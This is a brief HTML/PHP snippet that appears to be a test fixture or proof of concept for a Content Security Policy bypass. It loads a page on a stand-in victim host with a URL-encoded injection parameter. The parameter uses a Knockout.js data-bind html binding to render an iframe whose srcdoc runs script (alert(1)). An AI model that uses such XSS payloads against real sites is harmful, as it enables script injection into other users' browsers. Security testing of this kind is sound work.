<iframe src="http://victim.example.com/repo/csp/wh/knockout.php?inj=<?php
$payload = <<<'PAYLOAD'
<div data-bind="html:'<iframe srcdoc=&quot;<script>alert(1)</script>&quot;></iframe>'"></div>
PAYLOAD;
echo rawurlencode($payload);
?>
"<iframe>